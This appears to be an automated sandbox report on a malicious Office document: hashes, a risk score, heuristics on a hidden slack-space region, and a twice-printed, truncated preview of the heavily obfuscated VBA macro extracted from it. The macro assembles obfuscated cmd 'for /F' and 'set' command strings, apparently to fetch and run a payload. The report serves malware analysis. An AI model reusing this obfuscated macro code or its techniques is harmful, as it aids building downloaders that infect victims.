Office (OLE) malware analysis — malicious · 042bd79adc78fade

MALICIOUS

Office (OLE)

145.5 KB First seen: 2018-08-14

MD5: 0c927156d8ec4ad48edbbe02d696730e SHA-1: 62d5838c922d2d414ae1f4779edf74faf3603883 SHA-256: 042bd79adc78fade249ca3a2f382581f9cf8e5c7054a18fd28f7c4a8e498bf89

62 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is an OLE document with a significant amount of slack space and detected VBA macros. The VBA code is heavily obfuscated, making it difficult to determine its exact function, but it is highly probable that it is designed to download and execute a secondary payload. The embedded URL, while marked as benign, is the only external reference found.

Heuristics 3

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 149,013 bytes but its declared streams total only 57,887 bytes — 91,126 bytes (61%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29778 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29778 bytes
SHA-256: `f834bc3f8646b2345b7b1eddcaa8644b91619f85bf814e2086e90d742b600dd1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kztzzHWYZ" Private Function uQofBTmqh() On Error Resume Next asvJq = (VSYLtc * isXQK) + 72840 - BojsAt * RzSrZK * 14469 QtDDM = (PUABY * MkDnIw) + 27386 - ICIzjD * GUUSu * 645 RacQn = (THWFlo * sXIFL) + 4813 - fhYnju * aNEITz * 88794 ZwzjH = (AECrmA * zqCIi) + 77601 - jrXJA * Vaqwj * 36226 SvqJS = (TTvWhb * TXJjKq) + 34076 - WAMoGO * wGrqN * 53364 SdvQVh = (sMoBMd * GjqWZ) + 93864 - iUMZzX * irOKOu * 82407 End Function Private Function ZFARPSC() On Error Resume Next FdSrw = (TYvGj * PGFuu) + 43539 - tiXCf * YJmOE * 77833 wQziH = (amikZ * zuGWz) + 74276 - PdukZ * zOMhp * 67947 GmjoTY = (wFMTrb * PbNMbS) + 7749 - LOolnW * WFUqK * 53604 PLfCGt = (NOwJl * CGajoi) + 51306 - zikRj * GzBQTB * 681 End Function Private Function wHjjXPVcKizViw() On Error Resume Next laGAzD = 39004 - UPuLjd - 45313 * VmbCj * tbBQb / DjVWP * (89149 + wlRqNJ + 70800 - jmwNiI) CLKhAo = 26760 - ZlbjvW - 74915 * LvKOj * awRdsm / iPCBVU * (25599 + QwIuw + 14245 - ophorj) jHoSiq = 37038 - Vpuffu - 17832 * nuPGF * Ulncm / nabDbA * (49253 + AozpM + 93182 - QYdGMw) OsjOQh = 60141 - hbDiou - 46581 * miZbEv * tvjMp / CwIVo * (13515 + jfdQGS + 16378 - GFwmOB) mhFCkO = 30541 - wbBvW - 47922 * ZBZAuz * UjsoI / wDvBUh * (32069 + PScBA + 52666 - SuMPP) TlUqan = 4243 - BDduvO - 81806 * fUvAw * ZuINDN / Wasqa * (14230 + HJzbz + 19356 - miCABh) mRiOl = 69365 - VJwFn - 51465 * jzaoIJ * jzztV / BpjYsR * (77593 + dTFvj + 15412 - IjvNAT) End Function Private Function BwAZMaiNjoUfc() On Error Resume Next kShECC = (PonIU * jqCXo) + 7977 - PDjJhK * hPijdR * 20222 kqjiiP = (QqfIGa * vuKsWj) + 73479 - XsDiz * DiDpC * 97441 cufkIh = (mzvzS * tzOKSv) + 72672 - tibDzz * mQfSj * 28163 pNJAN = (hRzmJ * FhQDp) + 72398 - pNKmF * NzuAU * 36684 UHYwV = (TCown * GNBfk) + 90619 - ruZiFj * mrJpSJ * 95180 uIdFVh = (McYObA * IkktuJ) + 89157 - TPujc * wiiOHh * 13804 End Function Function XZnXrQ() On Error Resume Next CqbFMz = wcDcDj - hIrQBL - (98717 * NiaTiV) UBbkwz = kqETsU * tdzTS / 32879 * 44121 * (XGDaA / 23462) OAziXwij = CStr(Chr(FYJhFLdYZiOFd + KYiuKmtiI + 109 + wAzlSorVtRrqi + XwBzSiKcYRzaJ)) + "d /" + CStr(Chr(uBzPOdao + OHiwTiAPXO + 99 + KRHlYZTSOhU + qsSQKwKpXD)) + " " + "for" + " , , " + "/F , " + "; " + CStr(Chr(fFjzKmlRRqj + FBUtLjnAYdp + 34 + MSknnNjJsUkTDv + GzMJoFvpw)) + " d" + "el" tVWPEG = EZkEsc - Iazmw - (81758 * Btwmo) izJCcQ = HtlBq - oTRkZ - (89379 * kKZhZd) BSmIRdwjiL = "i" + CStr(Chr(ncGcuRLZTh + TcTMjkZ + 109 + EkRdcYLHWuqa + hlsqCsVOjcwthV)) + "s" + "=PL2D" + "f" + " " + " " + "t" + "okens=" + " 1 " + " " + CStr(Chr(FWFlirowR + Rwmncdi + 34 + nuXOPpBpjjq + HpUUELpwt)) + " " + " ," + " ; %" bacPsi = zGFYtu - LLzqAr - (19781 * bkhmQa) cdwTi = YPmmI - PrAUCG - (52409 * zjmiG) TNKXwo = WPLku - PdNjSo - (45581 * oFjhiz) KPsivN = "^z" + " ;" + " ;" + " In , " + " ; ( ," + " , ' " + " , F" + "tY^^" dqOpR = Izfqdd - dJfRV - (18175 * QZRim) NEDQl = jXnWB - apHPzM - (12253 * FwlVD) BPTiM = EGhYh - oRrcZW - (67569 * rvSUzu) hMhuWmDV = "p^^e" + " , ; " + "^\| " + ", ;" wwiSp = CItiF - KIQQF - (24177 * TTMjO) YfCfc = iMIQW - XcGkl - (40808 * ZzsMDw) ZWGAPZmAqz = " Fi" + "N^^" + "D ," + " ; " + CStr(Chr(sESwpTPz + aKzqWsqzR + 34 + JCozTHZ + iuVOWLXEzNTrGz)) + CStr(Chr(UihSwwcqHiB + WLqbmnjokULUlA + 99 + KCEHSwdrE + SfHoJuFdBcPU)) + CStr(Chr(pjKVwMw + wfzVjYiwXoG + 109 + djCajXCl + uHcOTWFlkuCK)) + CStr(Chr(ZYFTdsjD + GiTYfZUqCzC + 34 + JPcRCVU + XqAISjHBCr)) + " " + ", " + "; '" + " ; " + ") ; " + " ^d" + "o ," + " ," GjTwh = BmNaz - AVTNFf - (17420 * QjbGrY) kUHFv = " %^z; " + " , " + "SAk" + CStr(Chr(IoChFLaMHLJLUv + adhQYmG + 99 + XHliAuKqGB + jzKuuMMhpoW)) + "V" + CStr(Chr(bYJGYVha + DodGQwVNtdbq + 109 + WdauvijkGc + BkijsAZPGF)) + "B" + "/v" PTtUwv = afYGIW - qHfYz - (98863 * diQjAZ) RdlZaXHMcNP = "]~w" + "Wg^lR " + "^" + " ; " + ", M" + "dBauhw" + "A/^" + "R " + CStr(Chr(viTacBf + njuvnicwTiAhu + 34 + fNlbRQQRMVzM + HEwpdNAo)) + " , " + "(S^eT " kvVWOX = CtTFj - SUXHL - (6840 * MHGwTM) ... (truncated)

SHA-256: f834bc3f8646b2345b7b1eddcaa8644b91619f85bf814e2086e90d742b600dd1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kztzzHWYZ"
Private Function uQofBTmqh()
On Error Resume Next
   asvJq = (VSYLtc * isXQK) + 72840 - BojsAt * RzSrZK * 14469
   QtDDM = (PUABY * MkDnIw) + 27386 - ICIzjD * GUUSu * 645
   RacQn = (THWFlo * sXIFL) + 4813 - fhYnju * aNEITz * 88794
   ZwzjH = (AECrmA * zqCIi) + 77601 - jrXJA * Vaqwj * 36226
   SvqJS = (TTvWhb * TXJjKq) + 34076 - WAMoGO * wGrqN * 53364
   SdvQVh = (sMoBMd * GjqWZ) + 93864 - iUMZzX * irOKOu * 82407
End Function
Private Function ZFARPSC()
On Error Resume Next
   FdSrw = (TYvGj * PGFuu) + 43539 - tiXCf * YJmOE * 77833
   wQziH = (amikZ * zuGWz) + 74276 - PdukZ * zOMhp * 67947
   GmjoTY = (wFMTrb * PbNMbS) + 7749 - LOolnW * WFUqK * 53604
   PLfCGt = (NOwJl * CGajoi) + 51306 - zikRj * GzBQTB * 681
End Function
Private Function wHjjXPVcKizViw()
On Error Resume Next
   laGAzD = 39004 - UPuLjd - 45313 * VmbCj * tbBQb / DjVWP * (89149 + wlRqNJ + 70800 - jmwNiI)
   CLKhAo = 26760 - ZlbjvW - 74915 * LvKOj * awRdsm / iPCBVU * (25599 + QwIuw + 14245 - ophorj)
   jHoSiq = 37038 - Vpuffu - 17832 * nuPGF * Ulncm / nabDbA * (49253 + AozpM + 93182 - QYdGMw)
   OsjOQh = 60141 - hbDiou - 46581 * miZbEv * tvjMp / CwIVo * (13515 + jfdQGS + 16378 - GFwmOB)
   mhFCkO = 30541 - wbBvW - 47922 * ZBZAuz * UjsoI / wDvBUh * (32069 + PScBA + 52666 - SuMPP)
   TlUqan = 4243 - BDduvO - 81806 * fUvAw * ZuINDN / Wasqa * (14230 + HJzbz + 19356 - miCABh)
   mRiOl = 69365 - VJwFn - 51465 * jzaoIJ * jzztV / BpjYsR * (77593 + dTFvj + 15412 - IjvNAT)
End Function
Private Function BwAZMaiNjoUfc()
On Error Resume Next
   kShECC = (PonIU * jqCXo) + 7977 - PDjJhK * hPijdR * 20222
   kqjiiP = (QqfIGa * vuKsWj) + 73479 - XsDiz * DiDpC * 97441
   cufkIh = (mzvzS * tzOKSv) + 72672 - tibDzz * mQfSj * 28163
   pNJAN = (hRzmJ * FhQDp) + 72398 - pNKmF * NzuAU * 36684
   UHYwV = (TCown * GNBfk) + 90619 - ruZiFj * mrJpSJ * 95180
   uIdFVh = (McYObA * IkktuJ) + 89157 - TPujc * wiiOHh * 13804
End Function
Function XZnXrQ()
On Error Resume Next
CqbFMz = wcDcDj - hIrQBL - (98717 * NiaTiV)
   UBbkwz = kqETsU * tdzTS / 32879 * 44121 * (XGDaA / 23462)
OAziXwij = CStr(Chr(FYJhFLdYZiOFd + KYiuKmtiI + 109 + wAzlSorVtRrqi + XwBzSiKcYRzaJ)) + "d /" + CStr(Chr(uBzPOdao + OHiwTiAPXO + 99 + KRHlYZTSOhU + qsSQKwKpXD)) + " " + "for" + " , , " + "/F  , " + "; " + CStr(Chr(fFjzKmlRRqj + FBUtLjnAYdp + 34 + MSknnNjJsUkTDv + GzMJoFvpw)) + "  d" + "el"
tVWPEG = EZkEsc - Iazmw - (81758 * Btwmo)
   izJCcQ = HtlBq - oTRkZ - (89379 * kKZhZd)
BSmIRdwjiL = "i" + CStr(Chr(ncGcuRLZTh + TcTMjkZ + 109 + EkRdcYLHWuqa + hlsqCsVOjcwthV)) + "s" + "=PL2D" + "f" + " " + "  " + "t" + "okens=" + "   1 " + "  " + CStr(Chr(FWFlirowR + Rwmncdi + 34 + nuXOPpBpjjq + HpUUELpwt)) + " " + " ," + " ; %"
bacPsi = zGFYtu - LLzqAr - (19781 * bkhmQa)
   cdwTi = YPmmI - PrAUCG - (52409 * zjmiG)
   TNKXwo = WPLku - PdNjSo - (45581 * oFjhiz)
KPsivN = "^z" + " ;" + " ;" + " In , " + " ; ( ," + " , ' " + " , F" + "tY^^"
dqOpR = Izfqdd - dJfRV - (18175 * QZRim)
   NEDQl = jXnWB - apHPzM - (12253 * FwlVD)
   BPTiM = EGhYh - oRrcZW - (67569 * rvSUzu)
hMhuWmDV = "p^^e" + " ,  ; " + "^| " + ",  ;"
wwiSp = CItiF - KIQQF - (24177 * TTMjO)
   YfCfc = iMIQW - XcGkl - (40808 * ZzsMDw)
ZWGAPZmAqz = "  Fi" + "N^^" + "D ," + " ; " + CStr(Chr(sESwpTPz + aKzqWsqzR + 34 + JCozTHZ + iuVOWLXEzNTrGz)) + CStr(Chr(UihSwwcqHiB + WLqbmnjokULUlA + 99 + KCEHSwdrE + SfHoJuFdBcPU)) + CStr(Chr(pjKVwMw + wfzVjYiwXoG + 109 + djCajXCl + uHcOTWFlkuCK)) + CStr(Chr(ZYFTdsjD + GiTYfZUqCzC + 34 + JPcRCVU + XqAISjHBCr)) + "  " + ",  " + ";  '" + " ; " + ") ; " + " ^d" + "o  ," + "  ,"
GjTwh = BmNaz - AVTNFf - (17420 * QjbGrY)
kUHFv = " %^z; " + " , " + "SAk" + CStr(Chr(IoChFLaMHLJLUv + adhQYmG + 99 + XHliAuKqGB + jzKuuMMhpoW)) + "V" + CStr(Chr(bYJGYVha + DodGQwVNtdbq + 109 + WdauvijkGc + BkijsAZPGF)) + "B" + "/v"
PTtUwv = afYGIW - qHfYz - (98863 * diQjAZ)
RdlZaXHMcNP = "]~w" + "Wg^lR " + "^" + "   ; " + ", M" + "dBauhw" + "A/^" + "R  " + CStr(Chr(viTacBf + njuvnicwTiAhu + 34 + fNlbRQQRMVzM + HEwpdNAo)) + " , " + "(S^eT "
kvVWOX = CtTFj - SUXHL - (6840 * MHGwTM)
 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.